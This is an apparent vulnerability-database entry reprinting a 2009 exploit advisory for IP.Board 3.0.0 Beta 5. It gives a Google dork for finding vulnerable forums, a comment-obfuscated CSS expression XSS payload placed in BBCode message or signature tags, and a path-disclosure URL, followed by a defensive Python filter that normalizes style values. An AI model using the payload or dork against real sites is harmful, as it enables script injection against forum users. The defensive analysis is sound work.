Vendor: IP.Board
By: milw0rm.com
CVSS: 8,8 (HIGH)
Cross-site Scripting (XSS) and Path Disclosure
CWE: 79, 200
Product Name: IP.Board
Affected Version From: 3.0.0 Beta 5
Affected Version To: 3.0.0 Beta 5
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Internet Explorer 6,7,8 and Firefox 2.0
2009

Active XSS in message body or signature and Path disclosure in IP.Board 3.0.0 Beta 5

A vulnerability in IP.Board 3.0.0 Beta 5 allows an attacker to inject malicious JavaScript code into the message body or signature of a user. This code will be executed in the context of the user's browser when the message is viewed. Additionally, a path disclosure vulnerability exists in the same version of IP.Board, which allows an attacker to view the full path of the application on the server.

Mitigation:

Upgrade to the latest version of IP.Board

Exploit-DB raw data:

================================================================================

Found : brain[pillow]
Dork  : "Powered By IP.Board 3.0.0 Beta 5"
Visit : brainpillow.cc, forum.antichat.ru, raz0r.name
Greetz: slider, halkfild, m0nzt3r, c411k, ettee
Mail  : brainpillow@gmail.com
Note: works on IE 6,7,8. maybe all betas are vulnerable and it is possible to tune the xss for FF 2.0 too  ;) 

================================================================================

        Active XSS in message body or signature:

[email]qwe@[twitter]dodo style=`top:expr/*
        */ession/*bypassed*/(alert(/yahoo/))`do[/twitter]qwe.com[/email]

================================================================================

        Path disclosure:

http://forums.invisionpower.com/index.php?app=core&module=ajax&section=register&do=check-display-name&name[]=

================================================================================

# milw0rm.com [2009-04-27]
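
Added example (not part of the original advisory and not IP.Board's code): the style value in the XSS sample above splits `expression` with CSS comments and a line break, so a substring filter only sees it after the value has been normalized. The function names and the token list are assumptions made for illustration; an allowlist of permitted CSS properties is the stronger control.

```python
import re

# Style constructs that run script in legacy browsers (illustrative list, an assumption).
DANGEROUS = ("expression(", "javascript:", "vbscript:", "behavior:", "-moz-binding")

CSS_COMMENT = re.compile(r"/\*.*?\*/", re.DOTALL)
CSS_HEX_ESCAPE = re.compile(r"\\([0-9a-fA-F]{1,6})[ \t\r\n\f]?")
CSS_CHAR_ESCAPE = re.compile(r"\\([^\r\n\f0-9a-fA-F])")

# Style value taken from the advisory's [email]/[twitter] sample above.
ADVISORY_STYLE = "top:expr/*\n        */ession/*bypassed*/(alert(/yahoo/))"


def _decode_hex(match):
    code = int(match.group(1), 16)
    valid = 0 < code <= 0x10FFFF and not 0xD800 <= code <= 0xDFFF
    return chr(code) if valid else "\ufffd"


def normalize_css(value):
    """Collapse a style value to roughly what a lenient CSS parser acts on."""
    previous = None
    while previous != value:  # each changing pass shortens the string, so this ends
        previous = value
        value = CSS_COMMENT.sub("", value)              # strip /* ... */ comments
        value = CSS_HEX_ESCAPE.sub(_decode_hex, value)  # decode hex escapes
        value = CSS_CHAR_ESCAPE.sub(r"\1", value)       # drop single-char escapes
    value = re.sub(r"[\x00-\x20\x7f]", "", value)       # whitespace and control chars
    return value.lower()


def naive_is_dangerous(value):
    """Substring check on the raw value: the kind of filter the payload evades."""
    return any(token in value.lower() for token in DANGEROUS)


def is_dangerous(value):
    """Same token list, applied after normalization."""
    return any(token in normalize_css(value) for token in DANGEROUS)


if __name__ == "__main__":
    print("naive     :", naive_is_dangerous(ADVISORY_STYLE))
    print("normalized:", is_dangerous(ADVISORY_STYLE))
    print("seen as   :", normalize_css(ADVISORY_STYLE))
```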